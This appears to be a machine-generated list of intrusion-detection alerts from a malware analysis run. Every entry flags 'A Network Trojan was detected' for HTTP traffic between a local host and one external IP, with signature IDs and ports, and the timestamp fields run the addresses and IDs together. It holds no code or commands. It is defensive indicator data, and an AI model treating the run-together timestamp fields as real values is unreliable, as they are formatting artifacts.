            Timestamp:192.168.2.3171.22.30.14749700802825766 01/05/23-08:52:07.351938
            SID:2825766
            Source Port:49700
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749857802021641 01/05/23-08:52:58.054307
            SID:2021641
            Source Port:49857
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749727802021641 01/05/23-08:52:18.985108
            SID:2021641
            Source Port:49727
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499002025483 01/05/23-08:53:11.081962
            SID:2025483
            Source Port:80
            Destination Port:49900
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749944802025381 01/05/23-08:53:23.021157
            SID:2025381
            Source Port:49944
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750009802024313 01/05/23-08:53:42.368696
            SID:2024313
            Source Port:50009
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749871802021641 01/05/23-08:53:01.829225
            SID:2021641
            Source Port:49871
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749931802024318 01/05/23-08:53:19.484274
            SID:2024318
            Source Port:49931
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750009802024318 01/05/23-08:53:42.368696
            SID:2024318
            Source Port:50009
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749753802024313 01/05/23-08:52:26.326305
            SID:2024313
            Source Port:49753
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750075802024313 01/05/23-08:54:01.517358
            SID:2024313
            Source Port:50075
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749716802021641 01/05/23-08:52:14.357533
            SID:2021641
            Source Port:49716
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749931802024313 01/05/23-08:53:19.484274
            SID:2024313
            Source Port:49931
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750075802024318 01/05/23-08:54:01.517358
            SID:2024318
            Source Port:50075
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749793802021641 01/05/23-08:52:39.171445
            SID:2021641
            Source Port:49793
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749803802025381 01/05/23-08:52:41.905218
            SID:2025381
            Source Port:49803
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749853802024313 01/05/23-08:52:56.960046
            SID:2024313
            Source Port:49853
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749853802024318 01/05/23-08:52:56.960046
            SID:2024318
            Source Port:49853
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750027802021641 01/05/23-08:53:48.599181
            SID:2021641
            Source Port:50027
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749979802825766 01/05/23-08:53:34.430839
            SID:2825766
            Source Port:49979
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749758802025381 01/05/23-08:52:27.765970
            SID:2025381
            Source Port:49758
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749879802024313 01/05/23-08:53:03.965987
            SID:2024313
            Source Port:49879
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500052025483 01/05/23-08:53:41.369351
            SID:2025483
            Source Port:80
            Destination Port:50005
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749847802025381 01/05/23-08:52:55.372015
            SID:2025381
            Source Port:49847
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749823802825766 01/05/23-08:52:47.379297
            SID:2825766
            Source Port:49823
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749928802021641 01/05/23-08:53:18.678448
            SID:2021641
            Source Port:49928
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498732025483 01/05/23-08:53:02.440443
            SID:2025483
            Source Port:80
            Destination Port:49873
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750080802825766 01/05/23-08:54:02.852694
            SID:2825766
            Source Port:50080
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749839802021641 01/05/23-08:52:53.202583
            SID:2021641
            Source Port:49839
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750043802025381 01/05/23-08:53:52.949985
            SID:2025381
            Source Port:50043
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749756802024318 01/05/23-08:52:27.231494
            SID:2024318
            Source Port:49756
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749822802024313 01/05/23-08:52:47.112264
            SID:2024313
            Source Port:49822
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749756802024313 01/05/23-08:52:27.231494
            SID:2024313
            Source Port:49756
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749762802021641 01/05/23-08:52:28.868227
            SID:2021641
            Source Port:49762
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749822802024318 01/05/23-08:52:47.112264
            SID:2024318
            Source Port:49822
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749744802021641 01/05/23-08:52:23.736699
            SID:2021641
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749786802025381 01/05/23-08:52:37.217550
            SID:2025381
            Source Port:49786
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749804802024318 01/05/23-08:52:42.167879
            SID:2024318
            Source Port:49804
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497742025483 01/05/23-08:52:32.449175
            SID:2025483
            Source Port:80
            Destination Port:49774
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749810802021641 01/05/23-08:52:43.863274
            SID:2021641
            Source Port:49810
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749982802025381 01/05/23-08:53:35.215314
            SID:2025381
            Source Port:49982
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750047802024313 01/05/23-08:53:54.007519
            SID:2024313
            Source Port:50047
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749940802021641 01/05/23-08:53:21.893765
            SID:2021641
            Source Port:49940
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749833802021641 01/05/23-08:52:50.090304
            SID:2021641
            Source Port:49833
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749875802025381 01/05/23-08:53:02.907470
            SID:2025381
            Source Port:49875
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498392025483 01/05/23-08:52:53.283912
            SID:2025483
            Source Port:80
            Destination Port:49839
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499602025483 01/05/23-08:53:28.551541
            SID:2025483
            Source Port:80
            Destination Port:49960
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749980802024318 01/05/23-08:53:34.702395
            SID:2024318
            Source Port:49980
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749981802825766 01/05/23-08:53:34.961120
            SID:2825766
            Source Port:49981
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749784802024318 01/05/23-08:52:36.673037
            SID:2024318
            Source Port:49784
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749790802021641 01/05/23-08:52:38.345416
            SID:2021641
            Source Port:49790
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749850802024318 01/05/23-08:52:56.172529
            SID:2024318
            Source Port:49850
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749850802024313 01/05/23-08:52:56.172529
            SID:2024313
            Source Port:49850
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749879802024318 01/05/23-08:53:03.965987
            SID:2024318
            Source Port:49879
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749784802024313 01/05/23-08:52:36.673037
            SID:2024313
            Source Port:49784
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749980802024313 01/05/23-08:53:34.702395
            SID:2024313
            Source Port:49980
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750001802021641 01/05/23-08:53:40.243949
            SID:2021641
            Source Port:50001
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498232025483 01/05/23-08:52:47.459157
            SID:2025483
            Source Port:80
            Destination Port:49823
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749824802025381 01/05/23-08:52:47.639113
            SID:2025381
            Source Port:49824
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749849802825766 01/05/23-08:52:55.895226
            SID:2825766
            Source Port:49849
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749991802021641 01/05/23-08:53:37.629731
            SID:2021641
            Source Port:49991
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749994802021641 01/05/23-08:53:38.408241
            SID:2021641
            Source Port:49994
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750004802021641 01/05/23-08:53:41.033557
            SID:2021641
            Source Port:50004
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749953802825766 01/05/23-08:53:25.469204
            SID:2825766
            Source Port:49953
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500112025483 01/05/23-08:53:43.008527
            SID:2025483
            Source Port:80
            Destination Port:50011
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500712025483 01/05/23-08:54:00.509398
            SID:2025483
            Source Port:80
            Destination Port:50071
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749950802825766 01/05/23-08:53:24.624259
            SID:2825766
            Source Port:49950
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749861802825766 01/05/23-08:52:59.149010
            SID:2825766
            Source Port:49861
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498012025483 01/05/23-08:52:41.456999
            SID:2025483
            Source Port:80
            Destination Port:49801
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749821802025381 01/05/23-08:52:46.829983
            SID:2025381
            Source Port:49821
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750044802024318 01/05/23-08:53:53.227481
            SID:2024318
            Source Port:50044
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750041802024318 01/05/23-08:53:52.410718
            SID:2024318
            Source Port:50041
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750042802825766 01/05/23-08:53:52.687057
            SID:2825766
            Source Port:50042
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750045802825766 01/05/23-08:53:53.481872
            SID:2825766
            Source Port:50045
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750041802024313 01/05/23-08:53:52.410718
            SID:2024313
            Source Port:50041
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749775802825766 01/05/23-08:52:32.683406
            SID:2825766
            Source Port:49775
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749718802024318 01/05/23-08:52:15.464089
            SID:2024318
            Source Port:49718
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750032802021641 01/05/23-08:53:49.938594
            SID:2021641
            Source Port:50032
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749718802024313 01/05/23-08:52:15.464089
            SID:2024313
            Source Port:49718
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749759802024318 01/05/23-08:52:28.024665
            SID:2024318
            Source Port:49759
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498892025483 01/05/23-08:53:06.757466
            SID:2025483
            Source Port:80
            Destination Port:49889
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749699802021641 01/05/23-08:52:06.870270
            SID:2021641
            Source Port:49699
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749848802024318 01/05/23-08:52:55.640788
            SID:2024318
            Source Port:49848
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749730802024313 01/05/23-08:52:19.853027
            SID:2024313
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749788802021641 01/05/23-08:52:37.784136
            SID:2021641
            Source Port:49788
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749878802025381 01/05/23-08:53:03.704233
            SID:2025381
            Source Port:49878
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749730802024318 01/05/23-08:52:19.853027
            SID:2024318
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749966802021641 01/05/23-08:53:30.946864
            SID:2021641
            Source Port:49966
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750044802024313 01/05/23-08:53:53.227481
            SID:2024313
            Source Port:50044
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498672025483 01/05/23-08:53:00.853652
            SID:2025483
            Source Port:80
            Destination Port:49867
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497032025483 01/05/23-08:52:08.643965
            SID:2025483
            Source Port:80
            Destination Port:49703
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499982025483 01/05/23-08:53:39.543765
            SID:2025483
            Source Port:80
            Destination Port:49998
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750017802825766 01/05/23-08:53:44.537455
            SID:2825766
            Source Port:50017
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749787802024313 01/05/23-08:52:37.509502
            SID:2024313
            Source Port:49787
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749876802024318 01/05/23-08:53:03.175112
            SID:2024318
            Source Port:49876
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498452025483 01/05/23-08:52:54.928267
            SID:2025483
            Source Port:80
            Destination Port:49845
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749787802024318 01/05/23-08:52:37.509502
            SID:2024318
            Source Port:49787
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750071802025381 01/05/23-08:54:00.426977
            SID:2025381
            Source Port:50071
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749876802024313 01/05/23-08:53:03.175112
            SID:2024313
            Source Port:49876
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500492025483 01/05/23-08:53:54.623365
            SID:2025483
            Source Port:80
            Destination Port:50049
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749878802825766 01/05/23-08:53:03.704233
            SID:2825766
            Source Port:49878
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749976802825766 01/05/23-08:53:33.629058
            SID:2825766
            Source Port:49976
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749783802825766 01/05/23-08:52:36.372208
            SID:2825766
            Source Port:49783
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749915802825766 01/05/23-08:53:15.112176
            SID:2825766
            Source Port:49915
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749709802025381 01/05/23-08:52:11.256691
            SID:2025381
            Source Port:49709
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749922802024313 01/05/23-08:53:17.061545
            SID:2024313
            Source Port:49922
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750040802025381 01/05/23-08:53:52.135869
            SID:2025381
            Source Port:50040
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750083802825766 01/05/23-08:54:03.789158
            SID:2825766
            Source Port:50083
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750037802025381 01/05/23-08:53:51.314352
            SID:2025381
            Source Port:50037
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498952025483 01/05/23-08:53:08.453954
            SID:2025483
            Source Port:80
            Destination Port:49895
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749759802024313 01/05/23-08:52:28.024665
            SID:2024313
            Source Port:49759
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497592025483 01/05/23-08:52:28.116411
            SID:2025483
            Source Port:80
            Destination Port:49759
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749721802024318 01/05/23-08:52:17.231128
            SID:2024318
            Source Port:49721
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749756802021641 01/05/23-08:52:27.231494
            SID:2021641
            Source Port:49756
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749999802025381 01/05/23-08:53:39.715844
            SID:2025381
            Source Port:49999
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749816802024318 01/05/23-08:52:45.483412
            SID:2024318
            Source Port:49816
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749911802021641 01/05/23-08:53:14.014731
            SID:2021641
            Source Port:49911
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749721802024313 01/05/23-08:52:17.231128
            SID:2024313
            Source Port:49721
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749941802025381 01/05/23-08:53:22.165125
            SID:2025381
            Source Port:49941
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749779802024318 01/05/23-08:52:35.235559
            SID:2024318
            Source Port:49779
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749874802021641 01/05/23-08:53:02.624496
            SID:2021641
            Source Port:49874
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749790802024318 01/05/23-08:52:38.345416
            SID:2024318
            Source Port:49790
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749798802025381 01/05/23-08:52:40.547899
            SID:2025381
            Source Port:49798
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749885802024318 01/05/23-08:53:05.575803
            SID:2024318
            Source Port:49885
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749980802021641 01/05/23-08:53:34.702395
            SID:2021641
            Source Port:49980
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749790802024313 01/05/23-08:52:38.345416
            SID:2024313
            Source Port:49790
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749835802025381 01/05/23-08:52:50.902278
            SID:2025381
            Source Port:49835
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749922802024318 01/05/23-08:53:17.061545
            SID:2024318
            Source Port:49922
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750018802024318 01/05/23-08:53:44.999195
            SID:2024318
            Source Port:50018
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749885802024313 01/05/23-08:53:05.575803
            SID:2024313
            Source Port:49885
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750014802825766 01/05/23-08:53:43.719267
            SID:2825766
            Source Port:50014
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749740802025381 01/05/23-08:52:22.636691
            SID:2025381
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749881802825766 01/05/23-08:53:04.500331
            SID:2825766
            Source Port:49881
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750018802024313 01/05/23-08:53:44.999195
            SID:2024313
            Source Port:50018
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749997802021641 01/05/23-08:53:39.208772
            SID:2021641
            Source Port:49997
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749720802025381 01/05/23-08:52:16.949813
            SID:2025381
            Source Port:49720
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498202025483 01/05/23-08:52:46.639144
            SID:2025483
            Source Port:80
            Destination Port:49820
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749991802024318 01/05/23-08:53:37.629731
            SID:2024318
            Source Port:49991
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749763802825766 01/05/23-08:52:29.176849
            SID:2825766
            Source Port:49763
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498612025483 01/05/23-08:52:59.232281
            SID:2025483
            Source Port:80
            Destination Port:49861
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749991802024313 01/05/23-08:53:37.629731
            SID:2024313
            Source Port:49991
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750017802025381 01/05/23-08:53:44.537455
            SID:2025381
            Source Port:50017
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749907802825766 01/05/23-08:53:12.956728
            SID:2825766
            Source Port:49907
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749957802021641 01/05/23-08:53:26.768134
            SID:2021641
            Source Port:49957
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749809802825766 01/05/23-08:52:43.596832
            SID:2825766
            Source Port:49809
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499162025483 01/05/23-08:53:15.457182
            SID:2025483
            Source Port:80
            Destination Port:49916
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749800802825766 01/05/23-08:52:41.099242
            SID:2825766
            Source Port:49800
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749701802024318 01/05/23-08:52:07.731855
            SID:2024318
            Source Port:49701
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749813802021641 01/05/23-08:52:44.686594
            SID:2021641
            Source Port:49813
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749701802024313 01/05/23-08:52:07.731855
            SID:2024313
            Source Port:49701
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498992025483 01/05/23-08:53:10.249229
            SID:2025483
            Source Port:80
            Destination Port:49899
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750067802024313 01/05/23-08:53:59.373237
            SID:2024313
            Source Port:50067
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750022802825766 01/05/23-08:53:46.665385
            SID:2825766
            Source Port:50022
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749836802024318 01/05/23-08:52:51.681664
            SID:2024318
            Source Port:49836
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749776802021641 01/05/23-08:52:33.619524
            SID:2021641
            Source Port:49776
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749805802021641 01/05/23-08:52:42.467353
            SID:2021641
            Source Port:49805
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749799802024313 01/05/23-08:52:40.836883
            SID:2024313
            Source Port:49799
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749960802021641 01/05/23-08:53:28.475539
            SID:2021641
            Source Port:49960
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
